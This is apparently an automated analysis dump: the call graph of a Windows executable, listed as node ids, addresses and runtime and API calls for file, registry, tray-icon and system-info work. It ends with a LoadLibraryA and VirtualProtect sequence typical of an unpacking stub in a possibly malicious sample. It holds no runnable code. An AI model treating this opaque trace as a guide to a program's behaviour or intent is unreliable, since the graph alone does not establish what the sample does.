99624 f2dadf 99622->99624 99625 f2db95 99623->99625 99627 f2db0a 99623->99627 99626 f28d34 __commit 58 API calls 99624->99626 99628 f28d34 __commit 58 API calls 99625->99628 99629 f2dae4 99626->99629 99630 f2db32 99627->99630 99631 f2db28 99627->99631 99632 f2db2d 99628->99632 99633 f28d68 __lseeki64_nolock 58 API calls 99629->99633 99635 f2d446 ___lock_fhandle 59 API calls 99630->99635 99634 f28d34 __commit 58 API calls 99631->99634 99637 f28d68 __lseeki64_nolock 58 API calls 99632->99637 99644 f2daeb __setmode 99633->99644 99634->99632 99636 f2db38 99635->99636 99638 f2db4b 99636->99638 99639 f2db5e 99636->99639 99640 f2dba1 99637->99640 99641 f2dbb5 __write_nolock 76 API calls 99638->99641 99643 f28d68 __lseeki64_nolock 58 API calls 99639->99643 99642 f28ff6 __Wcsftime_l 9 API calls 99640->99642 99645 f2db57 99641->99645 99642->99644 99646 f2db63 99643->99646 99644->99616 99648 f2db8d __write RtlLeaveCriticalSection 99645->99648 99647 f28d34 __commit 58 API calls 99646->99647 99647->99645 99648->99644 99649->99610 99650->99612 99652 f24c80 99651->99652 99656 f24ca4 99651->99656 99653 f24916 __fclose_nolock 58 API calls 99652->99653 99652->99656 99654 f24c9d 99653->99654 99655 f2dac6 __write 78 API calls 99654->99655 99655->99656 99656->99616 99657->99616 99659 f25579 99658->99659 99660 f2558d 99658->99660 99707 f28d68 58 API calls __getptd_noexit 99659->99707 99662 f25589 99660->99662 99663 f24c6d __flush 78 API calls 99660->99663 99676 f25645 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99662->99676 99665 f25599 99663->99665 99664 f2557e 99708 f28ff6 9 API calls __Wcsftime_l 99664->99708 99677 f30dc7 99665->99677 99669 f24916 __fclose_nolock 58 API calls 99670 f255a7 99669->99670 99681 f30c52 99670->99681 99672 f255ad 99672->99662 99673 f22f95 _free 58 API calls 99672->99673 99673->99662 99674->99580 99675->99586 99676->99586 99678 f255a1 99677->99678 99679 f30dd4 99677->99679 99678->99669 99679->99678 99680 f22f95 _free 58 API calls 99679->99680 99680->99678 99682 f30c5e __setmode 99681->99682 99683 f30c82 99682->99683 99684 f30c6b 99682->99684 99686 f30d0d 99683->99686 99688 f30c92 99683->99688 99733 f28d34 58 API calls __getptd_noexit 99684->99733 99738 f28d34 58 API calls __getptd_noexit 99686->99738 99687 f30c70 99734 f28d68 58 API calls __getptd_noexit 99687->99734 99691 f30cb0 99688->99691 99692 f30cba 99688->99692 99735 f28d34 58 API calls __getptd_noexit 99691->99735 99709 f2d446 99692->99709 99693 f30cb5 99739 f28d68 58 API calls __getptd_noexit 99693->99739 99696 f30cc0 99699 f30cd3 99696->99699 99700 f30cde 99696->99700 99698 f30d19 99740 f28ff6 9 API calls __Wcsftime_l 99698->99740 99718 f30d2d 99699->99718 99736 f28d68 58 API calls __getptd_noexit 99700->99736 99703 f30c77 __setmode 99703->99672 99705 f30cd9 99737 f30d05 RtlLeaveCriticalSection __unlock_fhandle 99705->99737 99707->99664 99708->99662 99710 f2d452 __setmode 99709->99710 99711 f2d4a1 RtlEnterCriticalSection 99710->99711 99712 f29e4b __lock 58 API calls 99710->99712 99713 f2d4c7 __setmode 99711->99713 99714 f2d477 99712->99714 99713->99696 99715 f2d48f 99714->99715 99741 f2a06b InitializeCriticalSectionAndSpinCount 99714->99741 99742 f2d4cb RtlLeaveCriticalSection _doexit 99715->99742 99743 f2d703 99718->99743 99720 f30d91 99756 f2d67d 59 API calls 2 library calls 99720->99756 99722 f30d3b 99722->99720 99723 f30d6f 99722->99723 99726 f2d703 __lseeki64_nolock 58 API calls 99722->99726 99723->99720 99724 f2d703 __lseeki64_nolock 58 API calls 99723->99724 99728 f30d7b FindCloseChangeNotification 99724->99728 99725 f30d99 99729 f30dbb 99725->99729 99757 f28d47 58 API calls 3 library calls 99725->99757 99727 f30d66 99726->99727 99730 f2d703 __lseeki64_nolock 58 API calls 99727->99730 99728->99720 99731 f30d87 GetLastError 99728->99731 99729->99705 99730->99723 99731->99720 99733->99687 99734->99703 99735->99693 99736->99705 99737->99703 99738->99693 99739->99698 99740->99703 99741->99715 99742->99711 99744 f2d723 99743->99744 99745 f2d70e 99743->99745 99748 f28d34 __commit 58 API calls 99744->99748 99750 f2d748 99744->99750 99746 f28d34 __commit 58 API calls 99745->99746 99747 f2d713 99746->99747 99749 f28d68 __lseeki64_nolock 58 API calls 99747->99749 99751 f2d752 99748->99751 99752 f2d71b 99749->99752 99750->99722 99753 f28d68 __lseeki64_nolock 58 API calls 99751->99753 99752->99722 99754 f2d75a 99753->99754 99755 f28ff6 __Wcsftime_l 9 API calls 99754->99755 99755->99752 99756->99725 99757->99729 99820 f31b90 99758->99820 99761 f048f7 99826 f07eec 99761->99826 99762 f048da 99764 f07d2c 59 API calls 99762->99764 99765 f048e6 99764->99765 99822 f07886 99765->99822 99768 f209d5 99769 f31b90 __ftell_nolock 99768->99769 99770 f209e2 GetLongPathNameW 99769->99770 99771 f07d2c 59 API calls 99770->99771 99772 f0741d 99771->99772 99773 f0716b 99772->99773 99774 f077c7 59 API calls 99773->99774 99775 f0717d 99774->99775 99776 f048ae 60 API calls 99775->99776 99777 f07188 99776->99777 99778 f07193 99777->99778 99782 f3ecae 99777->99782 99779 f03f84 59 API calls 99778->99779 99781 f0719f 99779->99781 99834 f034c2 99781->99834 99784 f3ecc8 99782->99784 99840 f07a68 61 API calls 99782->99840 99785 f071b2 Mailbox 99785->98686 99787 f04f3d 135 API calls 99786->99787 99788 f069ef 99787->99788 99789 f3e45a 99788->99789 99790 f04f3d 135 API calls 99788->99790 99791 f697e5 122 API calls 99789->99791 99792 f06a03 99790->99792 99793 f3e46f 99791->99793 99792->99789 99794 f06a0b 99792->99794 99795 f3e473 99793->99795 99796 f3e490 99793->99796 99798 f06a17 99794->99798 99799 f3e47b 99794->99799 99800 f04faa 84 API calls 99795->99800 99797 f20ff6 Mailbox 59 API calls 99796->99797 99819 f3e4d5 Mailbox 99797->99819 99841 f06bec 99798->99841 99947 f64534 90 API calls _wprintf 99799->99947 99800->99799 99804 f3e489 99804->99796 99805 f3e689 99806 f22f95 _free 58 API calls 99805->99806 99807 f3e691 99806->99807 99808 f04faa 84 API calls 99807->99808 99813 f3e69a 99808->99813 99812 f22f95 _free 58 API calls 99812->99813 99813->99812 99814 f04faa 84 API calls 99813->99814 99951 f5fcb1 89 API calls 4 library calls 99813->99951 99814->99813 99816 f07f41 59 API calls 99816->99819 99819->99805 99819->99813 99819->99816 99933 f0766f 99819->99933 99941 f074bd 99819->99941 99948 f5fc4d 59 API calls 2 library calls 99819->99948 99949 f5fb6e 61 API calls 2 library calls 99819->99949 99950 f67621 59 API calls Mailbox 99819->99950 99821 f048bb GetFullPathNameW 99820->99821 99821->99761 99821->99762 99823 f07894 99822->99823 99830 f07e8c 99823->99830 99825 f048f2 99825->99768 99827 f07f06 99826->99827 99829 f07ef9 99826->99829 99828 f20ff6 Mailbox 59 API calls 99827->99828 99828->99829 99829->99765 99831 f07e9a 99830->99831 99833 f07ea3 _memmove 99830->99833 99832 f07faf 59 API calls 99831->99832 99831->99833 99832->99833 99833->99825 99836 f034d4 99834->99836 99839 f034f3 _memmove 99834->99839 99835 f20ff6 Mailbox 59 API calls 99837 f0350a 99835->99837 99838 f20ff6 Mailbox 59 API calls 99836->99838 99837->99785 99838->99839 99839->99835 99840->99782 99842 f3e847 99841->99842 99843 f06c15 99841->99843 100051 f5fcb1 89 API calls 4 library calls 99842->100051 99957 f05906 99843->99957 99847 f3e85a 100052 f5fcb1 89 API calls 4 library calls 99847->100052 99851 f06c54 99853 f077c7 59 API calls 99851->99853 99852 f3e876 99855 f06cc1 99852->99855 99854 f06c60 99853->99854 99979 f20b9b 60 API calls __ftell_nolock 99854->99979 99857 f3e889 99855->99857 99858 f06ccf 99855->99858 99860 f05dcf CloseHandle 99857->99860 99861 f077c7 59 API calls 99858->99861 99859 f06c6c 99862 f077c7 59 API calls 99859->99862 99864 f3e895 99860->99864 99865 f06cd8 99861->99865 99863 f06c78 99862->99863 99866 f048ae 60 API calls 99863->99866 99867 f04f3d 135 API calls 99864->99867 99868 f077c7 59 API calls 99865->99868 99869 f06c86 99866->99869 99870 f3e8b1 99867->99870 99871 f06ce1 99868->99871 99980 f059b0 ReadFile SetFilePointerEx 99869->99980 99873 f3e8da 99870->99873 99876 f697e5 122 API calls 99870->99876 99989 f046f9 99871->99989 100053 f5fcb1 89 API calls 4 library calls 99873->100053 99875 f06cb2 99981 f05c4e 99875->99981 99880 f3e8cd 99876->99880 99877 f06cf8 99881 f07c8e 59 API calls 99877->99881 99882 f3e8f6 99880->99882 99883 f3e8d5 99880->99883 99884 f06d09 SetCurrentDirectoryW 99881->99884 99885 f04faa 84 API calls 99882->99885 99886 f04faa 84 API calls 99883->99886 99890 f06d1c Mailbox 99884->99890 99888 f3e8fb 99885->99888 99886->99873 99887 f06e6c Mailbox 99952 f05934 99887->99952 99889 f20ff6 Mailbox 59 API calls 99888->99889 99896 f3e92f 99889->99896 99892 f20ff6 Mailbox 59 API calls 99890->99892 99894 f06d2f 99892->99894 99893 f03bcd 99893->98540 99893->98549 99895 f0538e 59 API calls 99894->99895 99922 f06d3a Mailbox __wsetenvp 99895->99922 99897 f0766f 59 API calls 99896->99897 99929 f3e978 Mailbox 99897->99929 99898 f06e47 99901 f3eb69 100058 f67581 59 API calls Mailbox 99901->100058 99905 f3eb8b 100059 f6f835 59 API calls 2 library calls 99905->100059 99908 f3eb98 99910 f22f95 _free 58 API calls 99908->99910 99909 f3ec02 99910->99887 99913 f0766f 59 API calls 99913->99929 99916 f3ebfa 99919 f07f41 59 API calls 99919->99922 99922->99898 99922->99909 99922->99916 99922->99919 100040 f059cd 67 API calls _wcscpy 99922->100040 100041 f070bd GetStringTypeW 99922->100041 100042 f0702c 60 API calls __wcsnicmp 99922->100042 100043 f0710a GetStringTypeW __wsetenvp 99922->100043 100044 f2387d GetStringTypeW _iswctype 99922->100044 100045 f06a3c 164 API calls 3 library calls 99922->100045 100046 f07373 59 API calls Mailbox 99922->100046 99923 f07f41 59 API calls 99923->99929 99927 f3ebbb 100060 f5fcb1 89 API calls 4 library calls 99927->100060 99929->99901 99929->99913 99929->99923 99929->99927 100054 f5fc4d 59 API calls 2 library calls 99929->100054 100055 f5fb6e 61 API calls 2 library calls 99929->100055 100056 f67621 59 API calls Mailbox 99929->100056 100057 f07373 59 API calls Mailbox 99929->100057 99930 f3ebd4 99931 f22f95 _free 58 API calls 99930->99931 99932 f3e8f1 99931->99932 99932->99887 99934 f0770f 99933->99934 99938 f07682 _memmove 99933->99938 99936 f20ff6 Mailbox 59 API calls 99934->99936 99935 f20ff6 Mailbox 59 API calls 99937 f07689 99935->99937 99936->99938 99939 f076b2 99937->99939 99940 f20ff6 Mailbox 59 API calls 99937->99940 99938->99935 99939->99819 99940->99939 99942 f074d0 99941->99942 99945 f0757e 99941->99945 99943 f20ff6 Mailbox 59 API calls 99942->99943 99946 f07502 99942->99946 99943->99946 99944 f20ff6 59 API calls Mailbox 99944->99946 99945->99819 99946->99944 99946->99945 99947->99804 99948->99819 99949->99819 99950->99819 99951->99813 99953 f05dcf CloseHandle 99952->99953 99954 f0593c Mailbox 99953->99954 99955 f05dcf CloseHandle 99954->99955 99956 f0594b 99955->99956 99956->99893 99958 f20ff6 Mailbox 59 API calls 99957->99958 99959 f05916 99958->99959 99960 f05dcf CloseHandle 99959->99960 99961 f05921 99960->99961 99962 f077c7 59 API calls 99961->99962 99963 f05929 99962->99963 99964 f05dcf CloseHandle 99963->99964 99965 f05930 99964->99965 99966 f05956 99965->99966 99967 f05dcf CloseHandle 99966->99967 99968 f05962 99967->99968 100063 f05df9 99968->100063 99970 f059a4 99970->99847 99970->99851 99971 f05981 99971->99970 100071 f05770 99971->100071 99973 f05993 100088 f053db SetFilePointerEx SetFilePointerEx 99973->100088 99975 f0599a 99975->99970 99976 f3e030 99975->99976 100089 f63696 SetFilePointerEx SetFilePointerEx WriteFile 99976->100089 99978 f3e060 99978->99970 99979->99859 99980->99875 99987 f05c68 99981->99987 99982 f3e151 100103 f05dae SetFilePointerEx 99982->100103 99983 f05cef SetFilePointerEx 100102 f05dae SetFilePointerEx 99983->100102 99986 f05cc3 99986->99855 99987->99982 99987->99983 99987->99986 99988 f3e16b 99990 f077c7 59 API calls 99989->99990 99991 f0470f 99990->99991 99992 f077c7 59 API calls 99991->99992 99993 f04717 99992->99993 99994 f077c7 59 API calls 99993->99994 99995 f0471f 99994->99995 99996 f077c7 59 API calls 99995->99996 99997 f04727 99996->99997 99998 f3d8fb 99997->99998 99999 f0475b 99997->99999 100000 f081a7 59 API calls 99998->100000 100001 f079ab 59 API calls 99999->100001 100002 f3d904 100000->100002 100003 f04769 100001->100003 100004 f07eec 59 API calls 100002->100004 100005 f07e8c 59 API calls 100003->100005 100007 f0479e 100004->100007 100006 f04773 100005->100006 100006->100007 100008 f079ab 59 API calls 100006->100008 100009 f3d924 100007->100009 100010 f047bd 100007->100010 100026 f047de 100007->100026 100011 f04794 100008->100011 100013 f3d9f4 100009->100013 100022 f3d9dd 100009->100022 100034 f3d95b 100009->100034 100015 f07b52 59 API calls 100010->100015 100014 f07e8c 59 API calls 100011->100014 100017 f07d2c 59 API calls 100013->100017 100014->100007 100020 f047c7 100015->100020 100016 f047ef 100018 f04801 100016->100018 100019 f081a7 59 API calls 100016->100019 100035 f3d9b1 100017->100035 100021 f081a7 59 API calls 100018->100021 100024 f04811 100018->100024 100019->100018 100025 f079ab 59 API calls 100020->100025 100020->100026 100021->100024 100022->100013 100030 f3d9c8 100022->100030 100023 f04818 100028 f081a7 59 API calls 100023->100028 100037 f0481f Mailbox 100023->100037 100024->100023 100027 f081a7 59 API calls 100024->100027 100025->100026 100104 f079ab 100026->100104 100027->100023 100028->100037 100029 f07b52 59 API calls 100029->100035 100033 f07d2c 59 API calls 100030->100033 100031 f3d9b9 100032 f07d2c 59 API calls 100031->100032 100032->100035 100033->100035 100034->100031 100038 f3d9a4 100034->100038 100035->100026 100035->100029 100117 f07a84 59 API calls 2 library calls 100035->100117 100037->99877 100039 f07d2c 59 API calls 100038->100039 100039->100035 100040->99922 100041->99922 100042->99922 100043->99922 100044->99922 100045->99922 100046->99922 100051->99847 100052->99852 100053->99932 100054->99929 100055->99929 100056->99929 100057->99929 100058->99905 100059->99908 100060->99930 100064 f3e181 100063->100064 100065 f05e12 CreateFileW 100063->100065 100066 f05e34 100064->100066 100067 f3e187 CreateFileW 100064->100067 100065->100066 100066->99971 100067->100066 100068 f3e1ad 100067->100068 100069 f05c4e 2 API calls 100068->100069 100070 f3e1b8 100069->100070 100070->100066 100072 f0578b 100071->100072 100073 f3dfce 100071->100073 100074 f05c4e 2 API calls 100072->100074 100087 f0581a 100072->100087 100073->100087 100096 f05e3f 100073->100096 100075 f057ad 100074->100075 100076 f0538e 59 API calls 100075->100076 100078 f057b7 100076->100078 100078->100073 100079 f057c4 100078->100079 100080 f20ff6 Mailbox 59 API calls 100079->100080 100081 f057cf 100080->100081 100082 f0538e 59 API calls 100081->100082 100083 f057da 100082->100083 100090 f05d20 100083->100090 100085 f05807 100086 f05c4e 2 API calls 100085->100086 100086->100087 100087->99973 100088->99975 100089->99978 100091 f05d93 100090->100091 100095 f05d2e 100090->100095 100101 f05dae SetFilePointerEx 100091->100101 100092 f05d56 100092->100085 100094 f05d66 ReadFile 100094->100092 100094->100095 100095->100092 100095->100094 100097 f05c4e 2 API calls 100096->100097 100098 f05e60 100097->100098 100099 f05c4e 2 API calls 100098->100099 100100 f05e74 100099->100100 100100->100087 100101->100095 100102->99986 100103->99988 100105 f07a17 100104->100105 100106 f079ba 100104->100106 100107 f07e8c 59 API calls 100105->100107 100106->100105 100108 f079c5 100106->100108 100109 f079e8 _memmove 100107->100109 100110 f079e0 100108->100110 100111 f3ef32 100108->100111 100109->100016 100118 f08087 59 API calls Mailbox 100110->100118 100119 f08189 100111->100119 100114 f3ef3c 100115 f20ff6 Mailbox 59 API calls 100114->100115 100116 f3ef5c 100115->100116 100117->100035 100118->100109 100120 f20ff6 Mailbox 59 API calls 100119->100120 100121 f08193 100120->100121 100121->100114 100122->98697 100124 f06ef5 100123->100124 100129 f07009 100123->100129 100125 f20ff6 Mailbox 59 API calls 100124->100125 100124->100129 100127 f06f1c 100125->100127 100126 f20ff6 Mailbox 59 API calls 100133 f06f91 100126->100133 100127->100126 100129->98701 100131 f074bd 59 API calls 100131->100133 100132 f0766f 59 API calls 100132->100133 100133->100129 100133->100131 100133->100132 100136 f063a0 100133->100136 100161 f56ac9 59 API calls Mailbox 100133->100161 100134->98704 100135->98706 100162 f07b76 100136->100162 100138 f065ca 100139 f0766f 59 API calls 100138->100139 100143 f3e41f 100171 f5fdba 91 API calls 4 library calls 100143->100171 100144 f07eec 59 API calls 100155 f063c5 100144->100155 100147 f0766f 59 API calls 100147->100155 100152 f068f9 _memmove 100172 f5fdba 91 API calls 4 library calls 100152->100172 100153 f3e3bb 100154 f08189 59 API calls 100153->100154 100155->100138 100155->100143 100155->100144 100155->100147 100155->100152 100155->100153 100158 f07faf 59 API calls 100155->100158 100167 f060cc 60 API calls 100155->100167 100168 f05ea1 59 API calls Mailbox 100155->100168 100169 f05fd2 60 API calls 100155->100169 100170 f07a84 59 API calls 2 library calls 100155->100170 100159 f0659b CharUpperBuffW 100158->100159 100159->100155 100161->100133 100163 f20ff6 Mailbox 59 API calls 100162->100163 100164 f07b9b 100163->100164 100165 f08189 59 API calls 100164->100165 100166 f07baa 100165->100166 100166->100155 100167->100155 100168->100155 100169->100155 100170->100155 100174 f030d2 LoadIconW 100173->100174 100176 f03107 100174->100176 100176->98721 100177->98720 100707 f03633 100708 f0366a 100707->100708 100709 f036e7 100708->100709 100710 f03688 100708->100710 100747 f036e5 100708->100747 100712 f036ed 100709->100712 100713 f3d31c 100709->100713 100714 f03695 100710->100714 100715 f0375d PostQuitMessage 100710->100715 100711 f036ca NtdllDefWindowProc_W 100749 f036d8 100711->100749 100716 f036f2 100712->100716 100717 f03715 SetTimer RegisterClipboardFormatW 100712->100717 100757 f111d0 10 API calls Mailbox 100713->100757 100718 f036a0 100714->100718 100719 f3d38f 100714->100719 100715->100749 100722 f036f9 KillTimer 100716->100722 100723 f3d2bf 100716->100723 100724 f0373e CreatePopupMenu 100717->100724 100717->100749 100725 f03767 100718->100725 100726 f036a8 100718->100726 100761 f62a16 71 API calls _memset 100719->100761 100721 f3d343 100758 f111f3 340 API calls Mailbox 100721->100758 100752 f044cb Shell_NotifyIconW _memset 100722->100752 100731 f3d2c4 100723->100731 100732 f3d2f8 MoveWindow 100723->100732 100724->100749 100755 f04531 64 API calls _memset 100725->100755 100734 f036b3 100726->100734 100741 f3d374 100726->100741 100728 f3d3a1 100728->100711 100728->100749 100738 f3d2e7 SetFocus 100731->100738 100739 f3d2c8 100731->100739 100732->100749 100735 f0374b 100734->100735 100736 f036be 100734->100736 100754 f045df 81 API calls _memset 100735->100754 100736->100711 100759 f044cb Shell_NotifyIconW _memset 100736->100759 100737 f0375b 100737->100749 100738->100749 100739->100736 100743 f3d2d1 100739->100743 100740 f0370c 100753 f03114 DeleteObject DestroyWindow Mailbox 100740->100753 100741->100711 100760 f5817e 59 API calls Mailbox 100741->100760 100756 f111d0 10 API calls Mailbox 100743->100756 100747->100711 100750 f3d368 100751 f043db 68 API calls 100750->100751 100751->100747 100752->100740 100753->100749 100754->100737 100755->100737 100756->100749 100757->100721 100758->100736 100759->100750 100760->100747 100761->100728 100762 f01055 100767 f02649 100762->100767 100765 f22f80 __cinit 67 API calls 100766 f01064 100765->100766 100768 f077c7 59 API calls 100767->100768 100769 f026b7 100768->100769 100774 f03582 100769->100774 100771 f02754 100773 f0105a 100771->100773 100777 f03416 59 API calls 2 library calls 100771->100777 100773->100765 100778 f035b0 100774->100778 100777->100771 100779 f035bd 100778->100779 100780 f035a1 100778->100780 100779->100780 100781 f035c4 RegOpenKeyExW 100779->100781 100780->100771 100781->100780 100782 f035de RegQueryValueExW 100781->100782 100783 f03614 RegCloseKey 100782->100783 100784 f035ff 100782->100784 100783->100780 100784->100783 100785 f01016 100790 f04ad2 100785->100790 100788 f22f80 __cinit 67 API calls 100789 f01025 100788->100789 100791 f20ff6 Mailbox 59 API calls 100790->100791 100792 f04ada 100791->100792 100793 f0101b 100792->100793 100797 f04a94 100792->100797 100793->100788 100798 f04a9d 100797->100798 100800 f04aaf 100797->100800 100799 f22f80 __cinit 67 API calls 100798->100799 100799->100800 100801 f04afe 100800->100801 100802 f077c7 59 API calls 100801->100802 100803 f04b16 GetVersionExW 100802->100803 100804 f07d2c 59 API calls 100803->100804 100805 f04b59 100804->100805 100806 f07e8c 59 API calls 100805->100806 100815 f04b86 100805->100815 100807 f04b7a 100806->100807 100808 f07886 59 API calls 100807->100808 100808->100815 100809 f04bf1 GetCurrentProcess IsWow64Process 100810 f04c0a 100809->100810 100812 f04c20 100810->100812 100813 f04c89 GetSystemInfo 100810->100813 100811 f3dc8d 100825 f04c95 100812->100825 100814 f04c56 100813->100814 100814->100793 100815->100809 100815->100811 100818 f04c32 100821 f04c95 2 API calls 100818->100821 100819 f04c7d GetSystemInfo 100820 f04c47 100819->100820 100820->100814 100822 f04c4d FreeLibrary 100820->100822 100823 f04c3a GetNativeSystemInfo 100821->100823 100822->100814 100823->100820 100826 f04c2e 100825->100826 100827 f04c9e LoadLibraryA 100825->100827 100826->100818 100826->100819 100827->100826 100828 f04caf GetProcAddress 100827->100828 100828->100826 100829 f01078 100834 f071eb 100829->100834 100831 f0108c 100832 f22f80 __cinit 67 API calls 100831->100832 100833 f01096 100832->100833 100835 f071fb __ftell_nolock 100834->100835 100836 f077c7 59 API calls 100835->100836 100837 f072b1 100836->100837 100838 f04864 61 API calls 100837->100838 100839 f072ba 100838->100839 100865 f2074f 100839->100865 100842 f07e0b 59 API calls 100843 f072d3 100842->100843 100844 f03f84 59 API calls 100843->100844 100845 f072e2 100844->100845 100846 f077c7 59 API calls 100845->100846 100847 f072eb 100846->100847 100848 f07eec 59 API calls 100847->100848 100849 f072f4 RegOpenKeyExW 100848->100849 100850 f3ecda RegQueryValueExW 100849->100850 100854 f07316 Mailbox 100849->100854 100851 f3ecf7 100850->100851 100852 f3ed6c RegCloseKey 100850->100852 100853 f20ff6 Mailbox 59 API calls 100851->100853 100852->100854 100863 f3ed7e _wcscat Mailbox __wsetenvp 100852->100863 100855 f3ed10 100853->100855 100854->100831 100856 f0538e 59 API calls 100855->100856 100857 f3ed1b RegQueryValueExW 100856->100857 100858 f3ed38 100857->100858 100860 f3ed52 100857->100860 100859 f07d2c 59 API calls 100858->100859 100859->100860 100860->100852 100861 f07f41 59 API calls 100861->100863 100862 f03f84 59 API calls 100862->100863 100863->100854 100863->100861 100863->100862 100864 f07b52 59 API calls 100863->100864 100864->100863 100866 f31b90 __ftell_nolock 100865->100866 100867 f2075c GetFullPathNameW 100866->100867 100868 f2077e 100867->100868 100869 f07d2c 59 API calls 100868->100869 100870 f072c5 100869->100870 100870->100842 100871 f40226 100877 f0ade2 Mailbox 100871->100877 100873 f40c86 100988 f566f4 100873->100988 100875 f40c8f 100877->100873 100877->100875 100878 f400e0 VariantClear 100877->100878 100879 f0b6c1 100877->100879 100884 f05906 60 API calls 100877->100884 100886 f7e237 100877->100886 100889 f6d2e6 100877->100889 100936 f7474d 100877->100936 100945 f12123 100877->100945 100985 f09df0 59 API calls Mailbox 100877->100985 100986 f57405 59 API calls 100877->100986 100878->100877 100987 f6a0b5 89 API calls 4 library calls 100879->100987 100884->100877 100887 f7cdf1 130 API calls 100886->100887 100888 f7e247 100887->100888 100888->100877 100890 f6d310 100889->100890 100891 f6d305 100889->100891 100893 f6d3ea Mailbox 100890->100893 100896 f077c7 59 API calls 100890->100896 100991 f09c9c 59 API calls 100891->100991 100894 f20ff6 Mailbox 59 API calls 100893->100894 100919 f6d3f3 Mailbox 100893->100919 100895 f6d433 100894->100895 100897 f6d43f 100895->100897 100899 f05906 60 API calls 100895->100899 100898 f6d334 100896->100898 100901 f09997 84 API calls 100897->100901 100900 f077c7 59 API calls 100898->100900 100899->100897 100902 f6d33d 100900->100902 100903 f6d457 100901->100903 100904 f09997 84 API calls 100902->100904 100905 f05956 67 API calls 100903->100905 100906 f6d349 100904->100906 100907 f6d466 100905->100907 100908 f046f9 59 API calls 100906->100908 100909 f6d49e 100907->100909 100910 f6d46a GetLastError 100907->100910 100911 f6d35e 100908->100911 100914 f6d500 100909->100914 100915 f6d4c9 100909->100915 100912 f6d483 100910->100912 100913 f07c8e 59 API calls 100911->100913 100912->100919 100994 f05a1a CloseHandle 100912->100994 100916 f6d391 100913->100916 100917 f20ff6 Mailbox 59 API calls 100914->100917 100918 f20ff6 Mailbox 59 API calls 100915->100918 100920 f6d3e3 100916->100920 100921 f63e73 3 API calls 100916->100921 100922 f6d505 100917->100922 100923 f6d4ce 100918->100923 100919->100877 100993 f09c9c 59 API calls 100920->100993 100926 f6d3a1 100921->100926 100922->100919 100928 f077c7 59 API calls 100922->100928 100929 f077c7 59 API calls 100923->100929 100930 f6d4df 100923->100930 100926->100920 100927 f6d3a5 100926->100927 100931 f07f41 59 API calls 100927->100931 100928->100919 100929->100930 100995 f6f835 59 API calls 2 library calls 100930->100995 100933 f6d3b2 100931->100933 100992 f63c66 63 API calls Mailbox 100933->100992 100935 f6d3bb Mailbox 100935->100920 100937 f09997 84 API calls 100936->100937 100938 f74787 100937->100938 100939 f063a0 94 API calls 100938->100939 100940 f74797 100939->100940 100941 f747bc 100940->100941 100942 f0a000 340 API calls 100940->100942 100944 f747c0 100941->100944 100996 f09bf8 100941->100996 100942->100941 100944->100877 100946 f09bf8 59 API calls 100945->100946 100947 f1213b 100946->100947 100949 f20ff6 Mailbox 59 API calls 100947->100949 100952 f469af 100947->100952 100950 f12154 100949->100950 100953 f12164 100950->100953 100954 f05906 60 API calls 100950->100954 100951 f12189 100961 f12196 100951->100961 101028 f09c9c 59 API calls 100951->101028 100952->100951 101027 f6f7df 59 API calls 100952->101027 100955 f09997 84 API calls 100953->100955 100954->100953 100957 f12172 100955->100957 100958 f05956 67 API calls 100957->100958 100960 f12181 100958->100960 100959 f469f7 100959->100961 100962 f469ff 100959->100962 100960->100951 100960->100952 101026 f05a1a CloseHandle 100960->101026 100963 f05e3f 2 API calls 100961->100963 101029 f09c9c 59 API calls 100962->101029 100966 f1219d 100963->100966 100967 f46a11 100966->100967 100968 f121b7 100966->100968 100970 f20ff6 Mailbox 59 API calls 100967->100970 100969 f077c7 59 API calls 100968->100969 100972 f121bf 100969->100972 100971 f46a17 100970->100971 100973 f46a2b 100971->100973 101030 f059b0 ReadFile SetFilePointerEx 100971->101030 101009 f056d2 100972->101009 100979 f46a2f _memmove 100973->100979 101031 f6794e 59 API calls 2 library calls 100973->101031 100977 f121ce 100977->100979 101024 f09b9c 59 API calls Mailbox 100977->101024 100980 f121e2 Mailbox 100981 f1221c 100980->100981 100982 f05dcf CloseHandle 100980->100982 100981->100877 100983 f12210 100982->100983 100983->100981 101025 f05a1a CloseHandle 100983->101025 100985->100877 100986->100877 100987->100873 101069 f56636 100988->101069 100990 f56702 100990->100875 100991->100890 100992->100935 100993->100893 100994->100919 100995->100919 100997 f09c08 100996->100997 100998 f3fbff 100996->100998 101003 f20ff6 Mailbox 59 API calls 100997->101003 100999 f07d2c 59 API calls 100998->100999 101001 f3fc10 100998->101001 100999->101001 101000 f07eec 59 API calls 101002 f3fc1a 101000->101002 101001->101000 101006 f09c34 101002->101006 101008 f077c7 59 API calls 101002->101008 101004 f09c1b 101003->101004 101004->101002 101005 f09c26 101004->101005 101005->101006 101007 f07f41 59 API calls 101005->101007 101006->100944 101007->101006 101008->101006 101010 f05702 101009->101010 101011 f056dd 101009->101011 101012 f07eec 59 API calls 101010->101012 101011->101010 101015 f056ec 101011->101015 101016 f6349a 101012->101016 101013 f634c9 101013->100977 101034 f05c18 101015->101034 101016->101013 101032 f63436 ReadFile SetFilePointerEx 101016->101032 101033 f07a84 59 API calls 2 library calls 101016->101033 101023 f635d8 Mailbox 101023->100977 101024->100980 101025->100981 101026->100952 101027->100952 101028->100959 101029->100966 101030->100973 101031->100979 101032->101016 101033->101016 101035 f20ff6 Mailbox 59 API calls 101034->101035 101036 f05c2b 101035->101036 101037 f20ff6 Mailbox 59 API calls 101036->101037 101038 f05c37 101037->101038 101039 f05632 101038->101039 101046 f05a2f 101039->101046 101041 f05d20 2 API calls 101044 f05643 101041->101044 101042 f05674 101042->101023 101045 f0793a 61 API calls Mailbox 101042->101045 101044->101041 101044->101042 101053 f05bda 101044->101053 101045->101023 101047 f05a40 101046->101047 101048 f3e065 101046->101048 101047->101044 101062 f56443 59 API calls Mailbox 101048->101062 101050 f3e06f 101051 f20ff6 Mailbox 59 API calls 101050->101051 101052 f3e07b 101051->101052 101054 f3e117 101053->101054 101055 f05bee 101053->101055 101068 f56443 59 API calls Mailbox 101054->101068 101063 f05b19 101055->101063 101058 f05bfa 101058->101044 101059 f3e122 101060 f20ff6 Mailbox 59 API calls 101059->101060 101061 f3e137 _memmove 101060->101061 101062->101050 101064 f05b31 101063->101064 101066 f05b2a _memmove 101063->101066 101065 f20ff6 Mailbox 59 API calls 101064->101065 101067 f3e0a7 101064->101067 101065->101066 101066->101058 101067->101067 101068->101059 101070 f56641 101069->101070 101071 f5665e 101069->101071 101070->101071 101073 f56621 59 API calls Mailbox 101070->101073 101071->100990 101073->101070 101074 102b090 101075 102b0a0 101074->101075 101076 102b1ba LoadLibraryA 101075->101076 101080 102b1ff VirtualProtect VirtualProtect 101075->101080 101077 102b1d1 101076->101077 101077->101075 